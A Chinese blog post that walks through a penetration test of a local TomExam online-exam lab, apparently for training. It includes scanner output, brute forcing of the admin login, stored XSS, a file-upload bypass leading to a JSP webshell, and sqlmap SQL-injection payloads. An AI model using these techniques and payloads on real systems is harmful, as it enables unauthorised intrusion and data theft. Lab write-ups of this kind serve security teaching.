49-渗透测试模拟实战-tomexam网络考试系统

已于 2024-06-22 18:48:18 修改
阅读量1.3k 收藏 22
点赞数 46
分类专栏: 渗透测试 文章标签: 运维 网络安全 web安全 网络 xss 安全性测试 安全威胁分析
于 2024-06-06 23:02:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42321190/article/details/139424041
版权

渗透测试,也称为“pentest”或“道德黑客”,是一种模拟攻击的网络安全评估方法,旨在识别和利用系统中的安全漏洞。这种测试通常由专业的安全专家执行,他们使用各种技术和工具来尝试突破系统的防御,如网络、应用程序、主机和服务。目标是评估系统的安全状况,并提供关于如何修复发现的问题的建议。

渗透测试可以分为几种类型,包括:

    1.    黑盒测试:测试者对目标系统的信息了解最少,就像真正的攻击者一样。
    2.    白盒测试:测试者对目标系统有完全的了解,包括代码、架构和设计。
    3.    灰盒测试:测试者对目标系统有一定了解,介于黑盒和白盒测试之间。
    4.    盲测:测试者在事先未通知的情况下进行测试,以评估组织的实时响应能力。
    5.    内部测试:从内部网络进行测试,以评估内部防御机制的有效性。

渗透测试是维护网络安全的重要组成部分,可以帮助组织识别并修复潜在的安全漏洞,减少被恶意攻击的风险。然而,进行渗透测试时必须遵守法律和道德规范,确保所有活动都在授权范围内进行。

tomexam环境部署:

jspstudy2016、 tomexam靶场环境  安全工具    

6bff436312974708a2a1187b5f0c43e0.png

 087a167c53914fc5bb1d96c03d2ace17.png

406ecc42711642b9999d704690721b24.png 管理员登录:

admin  admin

http://10.0.0.101:8080/tomexam/login.jsp

e418f6ba21bb4d4b9c98e1caffd1375c.png

工具漏洞扫描

1、快速使用fscan、appscan、nessus、nmap、awvs、goby、7kb、破壳、御剑等

web漏洞扫描工具:appscan、awvs(Acunetix)、Netsparker.

系统漏洞扫描工具:nessus

信息收集:

域名:fofa、谷歌、百度、零零信安等搜索引擎、DNS历史记录、DNS备案号查询、https证书

敏感信息:谷歌搜索,社工库检索、威胁情报、天眼查、零零信安、7kb、破壳、dirsearch

IP地址:有CDN通过fofa标签找到真实ip、文件的hash值、网站证书、dns历史记录

网站指纹:wappalyzer插件、御剑web指纹识别、在线平台

端口:nmap、masscan、fscan、goby

目录扫描:7kb、破壳、御剑

旁站信息:fofa、masscan、k8、goby、fscan

旁注:facan

D:\在线工具包v0.3.1公测版\storage\fscan>.\fscan64.exe -h 10.0.0.101
start infoscan
(icmp) Target 10.0.0.101      is alive
[*] Icmp alive hosts len is: 1
10.0.0.101:8080 open
10.0.0.101:80 open
10.0.0.101:135 open
10.0.0.101:3306 open
10.0.0.101:8009 open
10.0.0.101:84 open
10.0.0.101:86 open
10.0.0.101:139 open
10.0.0.101:89 open
10.0.0.101:90 open
10.0.0.101:445 open
10.0.0.101:1433 open
[*] alive ports len is: 12
start vulscan
[*] WebTitle: http://10.0.0.101         code:400 len:39     title:None
[*] NetInfo:
[*]10.0.0.101
   [->]oldboy-f74d04fe
   [->]10.0.0.101
[+] 10.0.0.101  MS17-010        (Windows Server 2003 3790 Service Pack 2)
[*] WebTitle: http://10.0.0.101:8080    code:200 len:2416   title:Directory Listing For /
[*] WebTitle: http://10.0.0.101:90      code:200 len:2416   title:Directory Listing For /
[+] mssql:10.0.0.101:1433:sa 123456
[*] WebTitle: http://10.0.0.101:84      code:200 len:239    title:Hacked Me
[+] http://10.0.0.101:84 poc-yaml-iis-put-getshell
[*] WebTitle: http://10.0.0.101:86      code:200 len:41578  title:XYCMS中心小学建站系统
[*] WebTitle: http://10.0.0.101:89      code:200 len:173580 title:Shop7z网上购物系统-国内顶级的专业网上购物系统开发服务商
[+] http://10.0.0.101:86 poc-yaml-iis-put-getshell
[+] http://10.0.0.101:89 poc-yaml-iis-put-getshell
已完成 12/12
[*] 扫描结束,耗时: 18.0463107s

服务端口爆破:超级弱口令检查工具(SNETCracker)、Bruter(弱口令漏洞)

0a5c849e3dad4b61949cd501b75ae8de.png

用御剑扫描后台目录;对扫描出来的网站目录进行访问检测(列目录漏洞)

b0b3c3c71f0a46899895e0171a183dcf.png

指纹信息:通过指纹信息找漏洞(中间件)

378bd82770f344a8a1a9a880140ef544.png

工具探测漏洞略过。。 

手工探测漏洞

bp与xary联合使用:

1、bp设置顶级代理;xary反向监听。

1-1、打开bp设置顶级代理:

a22ebeb6644c411fa222c59e814792ba.png

1-2、xary配置config.yaml文件填写网站地址及端口; 

# 被动代理配置

hostname_allowed: [10.0.0.101]

port_allowed: [8080]

074c933cb6e047789efb3f265a9ac71d.png

 1-3、xary输入命令运行:

xray.exe webscan --listen 127.0.0.1:7777 --html-output lan2024.html

这个命令将启动Xray进行Web扫描,监听本地主机的7777端口,并将扫描结果以HTML格式保存到一个名为lan2024.html的文件中 

276a17eeb11b4b65b89fb219b63a5bdb.png

 即bp放一次包xary自动检测一次漏洞;

1-1、登陆页面探测漏洞:

1-1.1随意输入账户和密码查看登录提示:

7927ac1fab6d472ebfd848e35d45b972.png

 不存在不安全提醒:

44387059273d45438eabb4ba1a0c3600.png

1-1.2、bp抓包查看请求包:

存在明文密码漏洞(https明文密码不算漏洞)

7f3f187689b843ee94f8710ab10d2c9e.png

1-1.3、切换到管理员模式bp抓包进行暴力破解:(验证码可重复使用、弱口令密码)

f8686407e4d64da89ff5e225332c32e4.png

354471795e8c4391adba9ca7bcd21643.png

开启选项里的重定向功能 

07e777e0ba404dd7918a4b12894e9b65.png

40dfc0831f5e4dc8b2bd2d4c22ca2dc8.png

1-2、注册页面探测漏洞

a581b56f6ded42a8b7c6085a66ef8272.png

1-2.1、注册个新账号:(不安全提示漏洞)

(注册页面用户名存在不安全提示,登录密码没有密码长度限制及复杂度限制)

0a5a86d1b6204505906be4cbe5efbb63.png

1-2.2、尝试xss漏洞,调整字符限制;(未测试出xss)

b3ab7a59ca5c434db3341b1fb574e021.png

2d4e2caa099d4804ba70a7fbab8a8d07.png

1-3、登录后修改个人资料页面探测漏洞

1-3.1修改个人资料,邮箱位置插入xss代码(存在xss漏洞)

96b6f3cdec36418d862effee3905f3be.png

64e91123173244eb8f0c4eb887d55846.png

1-3.2、修改个人资料,形象图片位置查看源代码,发现文件上传模块连接:

(列目录、webshell漏洞)

65cc05a6d17e4bd0b0308adfd92e324a.png

访问源代码里的链接:

http://10.0.0.101:8080/tomexam/inc/upload/postfile.html

可直接上传文件(限制照片格式) 

1f7a2e376ad5455d81d031a10e2074f0.png

fe109ba5b03a408aa0b782017cd488c7.png

 抓包查看响应包,观察上传文件服务器端保存文件的格式:

2a4ea5bfd8fc4f8bb19819bbcb24f036.png

多次上传:

upload/20240606/tes_20240606214251421.jpg

upload/20240606/tes_20240606214420656.jpg

upload/20240606/tes_20240606214435484.jpg

根据观察后三位是随机数,前几位为时间;

 根据这一特性,抓包快速爆破:

bp设置后缀名变量,批量上传jpg、jsp格式:(快速爆破绕过限制)

4f63be0dc5484b67a0e249f305576cf2.png

 添加有效载荷:

jpg
jsp
jpg
jsp
jpg
jsp

35396058d9af440eb60d2033fa347f55.png

 开始攻击:(批量上传jpg、jsp成功)

860a178024fe4bad8705d6b86eef97b0.png

访问jpg格式上传的文件url,bp抓包后三位数字设置变量,后缀名改为jsp进行探测上传成功的jsp文件:

http://10.0.0.101:8080/tomexam/upload/20240606/tes_20240606220541843.jpg

代理拦截选项需取消拦截客户端请求中的File extension(不然访问文件bp不拦截)

bb37ec561b814dd8ba68fafc4a55f552.png

 抓包

deff5593e7f8462eb91f44485cd552f1.png

 设置后三位数字变量,后缀名改为jsp:

8c4e9b7a62934aac984ab5bff20cf487.png

 设置后三位数字有效载荷范围:

e7feca01f25a4c8b9836c0cfc63c850b.png 开始攻击:(成功筛选出上传成功的jsp文件)

68e9610eb09c4a6a9620aecef9008abc.png 访问webshell文件:

 http://10.0.0.101:8080/tomexam/upload/20240606/tes_20240606220541796.jsp

正常解析 , 成功webshell

d2a4f5b67df147329d68cd078de99d34.png

81c6c89607c0430189802757541a5028.png ------------------

方式二: 经过测试直接访问目录可查看上传上传的webshell文件:

http://10.0.0.101:8080/tomexam/upload/20240606/

a201bbfe317f47f5a6c31d632a8d19b4.png

1-4、登陆后新闻中心页面漏洞探测

1-4.1、点击新闻中心--通知;xary提示注入漏洞:

 复制提示链接访问,bp抓包,复制请求包到sqlmap跑注入:

链接:

http://10.0.0.101:8080/tomexam/page.do?action=comm_news&act=list&classid=2

bp抓包:

GET http://10.0.0.101:8080/tomexam/page.do?action=comm_news&act=list&classid=2 HTTP/1.1
Host: 10.0.0.101:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: JSESSIONID=DE7DAB778A6275DA60A1EBA38E9D7A41; 4unT_2132_lastvisit=1715954790; 4unT_2132_ulastactivity=bbe7dShKgYKRaBrRbwkvKSunwF6na%2B4Ow0kVNoUVHsSdR0D2Ii4f; 4unT_2132_visitedfid=2; 4unT_2132_smile=1D1; sitekeyword=%3Ca+href%3D%27http%3A%2F%2Fx%2E5vshop%2Ecom%27%3E5vShop%C8%FD%BA%CF%D2%BB%B5%E7%C9%CC%CF%B5%CD%B3%C9%CF%CA%D0%21%21%3C%2Fa%3E%26nbsp%3B%26nbsp%3B%3Ca+href%3D%27show%2Easp%3Fpkid%3D4929%27%3E%C3%C9%CC%D8%CB%B9%3C%2Fa%3E%26nbsp%3B%26nbsp%3B%3Ca+href%3D%27productlist%2Easp%3Fkind%3D00030008%27%3E%D6%D0%B5%CD%B6%CB%C3%C0%BE%C6%3C%2Fa%3E%26nbsp%3B%26nbsp%3B%26nbsp%3B
Connection: close

 sqlmap跑请求包(1.txt):

步骤一:
C:\lan\sqlmap>sqlmap.py -r c:\1.txt
步骤二:
Are you sure you want to continue? [y/N] y
步骤三:
GET parameter 'classid' is vulnerable. Do you want to keep testing the others (if any)?[y/N] n

sqlmap identified the following injection points with a total of 406 HTTP(s) requests:
---
结果:
Place: GET
Parameter: classid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=comm_news&act=list&classid=2 AND 2799=2799

    Type: UNION query
    Title: MySQL UNION query (NULL) - 16 columns
    Payload: action=comm_news&act=list&classid=2 UNION ALL SELECT CONCAT(0x3a6764763a,0x7472436a517a6d46616d,0x3a716b633a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: action=comm_news&act=list&classid=2 AND SLEEP(5)
---
[20:08:35] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11

存在sql注入漏洞。

1-5、越权漏洞探测

1-5.1、管理员账户链接用普通用户打开访问:(需两个浏览器分别登录)

Microsoft Edge浏览器登录管理员用户:

Google浏览器登录普通用户:

 

 在试卷管理-管理试卷-试卷分析存在越权漏洞:

复制管理员链接:

 普通用户访问管理员链接:

http://10.0.0.101:8080/tomexam/system/analysis.do?action=shijuan

(管理员用户的试卷分析右击复制链接用普通用户访问可以直接访问 )

声明:

  • 此文章只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途,如果您对文章内容有疑问,可以尝试留言私信,如有侵权请联系小编处理。

Xlbb.
关注
  • 46
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
TomExam安装
qq_43048069的博客
03-14 2539
TomExam安装一、简介:二、下载:三、安装 一、简介: TomExam第一版发布于2010年,在过去的数年中,它为数以万计的用户提供了良好的网络考试解决方案。它基于JAVA与MYSQL开发,可以稳定、顺畅的运行在Windows与Linux平台上。 TomExam支持各种常见题型,提供普通试卷、随机试卷两种试卷形式,并且支持试题随机混排,单题与整卷展示模式。 二、下载: 下载地址:http://...
tomexam在线考试系统.rar
08-29
TOMEXAM是基于JAVA与MYSQL开发的免费在线考试系统。它可以稳定、顺畅的运行在Windows与Linux**台上。 您可以通过它创建题库,发布试卷,组织考试,并由系统自动批改。 高度的可配置性和灵活性使得它可以被应用于很多领域。
tomexam php,【鲲鹏专家成长营】搭建TomExam在线考试系统
weixin_39628268的博客
03-23 767
TomExam是一款操作方便,性能优秀的网络考试系统,它可以运行在公网和局域网环境,创建题库并组织考试。TomExam可以自动或人工创建试卷,组织考试,并对考生提交的答卷自动批改,并提供成绩查询分析等功能。您也可以通过它创建题库系统,打印纸张试卷来组织线下考试。高度的可配置性、灵活性和稳定性将大大提高常规考试的效率。TomExam有开源版本,开源版本有人数限制,最大支持200人,针对小企业足够用了...
TomExam_Manual.zip
12-10
三恩在线考试系统是目前市场上最畅销的远程网络在线考试系统、学习系统,适合政府、 学校及企业的各种形式在线考试、练习、竞赛等应用,全面实现了考试工作的网络化、无纸化、自动化。采用新一代纯B/S架构,用于INTERNET、局域网、虚拟专网或者其他任何网络环境中的在线考试,可以承载大规模在线考试的需求,而且对服务器的配置要求非常低,客户端不用任何设置。几乎能满足企业、政府机构、教育单位的所有需求。三恩在线考试系统采用多层架构,基于基于Microsoft.NET平台,多年的用户考验保证了在线考试系统高效稳定的运行。系统灵活运用传统技术与最新技术相结合,通用性、可定制性、适应性非常强,可广泛应用于各行各业。
tomexam3_free.sql
07-22
源程序请访问:https://download.csdn.net/download/xcr530551426/11339831
Java在线网络考试系统 TomExam源码版
07-12
TomExam网络考试系统,在jdk8下编译通过 数据库:https://download.csdn.net/download/xcr530551426/11395667
考试系统 TomExam网络考试系统 v3.0
10-26
TomExam优质版发布于2010年,在过去的数年中,它为数以万计的用户提供了良好的网络考试解决方案。TomExam基于JAVA与MYSQL开发,可以稳定、顺畅的运行在Windows与Linux平台上。您可以通过它
tomexam_utf_v1.rar_tomexam_考试管理系统
09-20
功能不错的考试管理系统, 支持多种题型.
TOMEXAM在线考试系统 2.1
08-01
TOMEXAM是基于JAVA与MYSQL开发的免费在线考试系统。它可以稳定、顺畅的运行在Windows与Linux平台上。您可以通过它创建题库,发布试卷,组织考试,并由系统自动批改。高度的可配置性和灵活性使得它可以被应用于很多...
开源-TomExam网络考试系统
CJ2680678884的博客
03-21 1009
下面以新安装方式介绍一下Linux平台的安装过程,主要包括3个步骤: 1、安装JDK,1.6版及以上 2、安装mysql,5.5版及以上 3、安装tomcat,5.0版及以上 4、安装TomExam3.0 准备工作: 1、准备好需要的软件 2、创建:/home/tools文件夹(该文件夹可按自己需求创建) 3、系统环境...
Tomexam+JSP在线考试系统+v2.1Java源码
07-24
Tomexam+JSP在线考试系统+v2.1Java源码
Tomexam在线考试系统 2.1
weixin_34314962的博客
03-11 564
TOMEXAM是基于JAVA与MYSQL开发的免费在线考试系统。 它可以稳定、顺畅的运行在Windows与Linux平台上。您可以通过它创建题库,发布试卷,组织考试,并由系统自动批改。高度的可配置性和灵活性使得它可以被应用于很多领域。 TOMEXAM安装方法: 1.解压缩程序压缩包。并部署到Tomcat,如http://localhost:8080/tomexam 2...
TomExam开源在线考试系统
Max.blog
07-23 7502
官网:http://www.tomexam.com/ 源程序下载地址:https://download.csdn.net/download/xcr530551426/11339831 源码在jdk8下编译通过,管理员账户:admin admin 数据库脚本如下: /* Navicat MySQL Data Transfer Source Server : localhost440...
tomexam3和mysql_TomExam免费版
weixin_35997546的博客
01-30 897
TomExam是一款专业的网络考试系统,提供普通试卷和随机试卷两种试卷形式,支持多种常见题型,新增题库分析、查看自测记录、错题高亮标注、在线学习优化等功能,具有安全、稳定、高效的特点,需要的朋友可以下载!软件功能1、提供快速安装功能,轻松完成部署2、支持试题批量导入,新增断电答卷保护功能3、试卷批改进度功能,随时了解考试与批改进度4、在线学习功能,学习考试两不误5、新增多项实用功能并对现有多项功能...
Tomcat 爆出高危漏洞!
macrozheng的专栏
03-03 1772
转载自:www.anquanke.com/post/id/199448一、漏洞背景 安全公告编号:CNTA-2020-00042020年02月20日, 360CERT 监测发现 国家信息...
使用中国菜刀(结合一句话木马)通过Iiswriter的put方法getshell
wsnbbz的博客
12-30 3421
1.在客户端安装iiswrite软件,并关闭客户端防火墙 2.服务器安装iis,勾选以下选项 3.更改iis网站的主目录,将所有权限都勾选,再将网址的权限里来宾账户的权限改为完全控制 4.在客户机使用iiswrite对服务器所在文夹件上传一个txt文件并改后缀为asp,内容为<%eval(eval(chr(114)+chr(101)...
IIS-PUT上传漏洞
swordheart的博客
11-30 3668
IIS-PUT上传漏洞 IIS Server 在 Web 服务扩展中开启了 WebDAV ,网站配置了可以写入的权限,造成任意文件上传。影响版本6.0 包括配置了脚本资源访问的权限 使用burpsuite 进行测试,先PUT上传1.txt的asp的一句话 本来put上传后的状态码应该是201,由于服务器已经put上传了1.txt,所以返回的状态码为200 然后通过copy或者move方法复制或移动到指定123.asp文件当中去。 当然Destination这个是指定你创建的asp
IIS PUT漏洞原理和复现
p_utao的博客
01-27 671
漏洞成因 IIS server在WEB服务拓展中开启了WebDAV,配置了写入权限,脚本资源访问权限。导致任意文件上传 本地搭建 首先允许webDAV 查看IP命令为ipconfig 把IP地址调整为这台机器的IP地址 返回访问该IP 因为这里主要是为了锻炼写POC,当然也可以直接使用桂林老兵验证直接写shell POC验证 POC验证: import requests url = "http://IP" r = requests.options(url) result = r.headers[
渗透测试sec123笔记
qq_56426046的博客
12-13 2552
使用cs的端口扫描是非常缓慢的,如果还需要对端口进行探测最好在cs上开启代理,再设置 proxychains4代理nmap进行内网扫描 beacon上执行命令 socks 端口 再编辑 kali上的 /etc/proxychains4.conf文件。这个漏洞在文件管理的压缩包上传功能,上传的压缩包会被自动解压,如果我们在压缩包中放入 war 包并配合解压后目录穿越 war 包就会被移动到 tomcat 的 webapps 目录,而 tomcat 会自动解压 war 包。
长亭雷池部署
最新发布
hellodaoyan的博客
06-14 402
然后把这个文件下载下来这是雷池的源文件 这个网上找吧 不知道能不能发给你们。之前在自己的虚拟机docker上试过安装github上的雷池。现在重新安装了ubuntu 在我的ubuntu上安装一个雷池。web账号:admin/pmdmwtMp 这个应该行吧。手工进行安装前环境检查,或在运行安装包的目录下,然后 下面第二个命令需要root 我试过了。这个不知道干嘛的然后应该后面会有用把。WAF 安装到 /data/基本就是照着ppt做就行很简单。,如果没有安装则进行自动安装。节点状态」确认节点正常。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值